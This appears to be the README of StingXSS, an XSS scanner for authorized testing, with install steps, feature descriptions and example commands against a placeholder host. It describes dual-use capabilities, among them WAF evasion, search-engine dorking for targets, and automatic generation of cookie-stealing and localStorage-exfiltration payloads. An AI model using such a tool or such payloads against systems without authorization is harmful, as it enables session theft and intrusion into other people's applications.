The context-aware XSS scanner — reflected, DOM, stored, blind, and browser-confirmed XSS with WAF evasion, CRLF injection, XST, and PoC generation. No Burp license. Just findings.
# Kali / Debian / Ubuntu — venv required on externally-managed Python
python3 -m venv .venv && source .venv/bin/activate
pip install stingxss
pip install stingxss[browser] # + headless browser engineOr from source:
git clone https://github.com/CommonHuman-Lab/stingxss.git
cd stingxss
python3 -m venv .venv && source .venv/bin/activate
pip install -e .Point it at a target. Get findings. Drop it in a pipeline.
Most XSS scanners fire generic payloads and check for reflection. StingXSS goes further at every step:
Context first. Before injecting a single payload, StingXSS classifies exactly where the input lands — inside a <script> block, a double-quoted attribute, a template literal, an Angular expression, a CSS value. The payloads sent are chosen for that specific context, not sprayed blindly.
Smarter, not just more. Filter-probing runs automatically on every reflected parameter: one extra request maps which special characters the server encodes or strips, then only payloads that can actually work in that environment are tried. Fewer requests, higher signal.
Confirmed, not assumed. Reflection is a hint. Execution is a finding. The headless Chromium engine intercepts actual alert() and confirm() calls via Chrome DevTools Protocol — if the JavaScript didn't run, it's not reported as confirmed.
Finds what HTTP scanners miss. Single-page apps expose routes through hash fragments (#/search?q=). StingXSS discovers and tests those. Static DOM analysis (28 sources × 43 sinks) catches DOM XSS without a browser, in any CI environment.
From finding to PoC in one step. --poc generates ready-to-use exploitation payloads — cookie-stealers, localStorage exfil, stealth wrappers — for every confirmed finding.
Pipeline-native. JSON output, clean exit codes, a Python API. Drop it into a CI job, chain it with other tools, or call it from a script.
stingxss -u "https://target.com/search?q=test"
stingxss -u "https://target.com/#/search?q=test" --browser
stingxss -u "https://target.com/" --crawl --level 2 -o results.json
stingxss -u "https://target.com/comment" --blind "https://xyz.oast.me"
stingxss -u "https://target.com/search?q=test" --pocRun with no arguments for interactive wizard mode.
Reflected, DOM, stored, blind, and browser-confirmed XSS — plus CRLF injection, XST, CORS misconfigurations, prototype pollution, DOM clobbering, clickjacking, HSTS, SRI, JSONP, open redirects, GraphQL and WebSocket injection, and vulnerable client-side libraries. WAF fingerprinting and evasion built in.
| Topic | Description |
|---|---|
| CLI Flags | All flags, grouped by function |
| Capabilities | Every detection type with details |
| Smart Scanning | Filter probing, scan levels, custom payloads |
| WAF Evasion | Auto-detection, 12 transforms, manual override |
| Authentication | Form login, HTTP auth, OpenAPI, browser crawl |
| Output & Reports | PoC, HTML reports, SARIF, JSON, exit codes |
| Dorking | Target discovery via DuckDuckGo / Bing / Yahoo |
| Browser Engine | Headless Chromium, confirmed execution |
| Python API | Integration and scripting |
| Fire Range | Deliberately vulnerable test lab |
Only run StingXSS against applications you own or have explicit written authorization to test. Authorized use includes penetration testing engagements, bug bounty programs within defined scope, and CTF competitions.
The authors accept no liability for unauthorized or illegal use.
Licensed under the AGPLv3. You are free to use, modify, and distribute this software. If you run it as a service or distribute it, the source must remain open.
For commercial licensing, contact the author.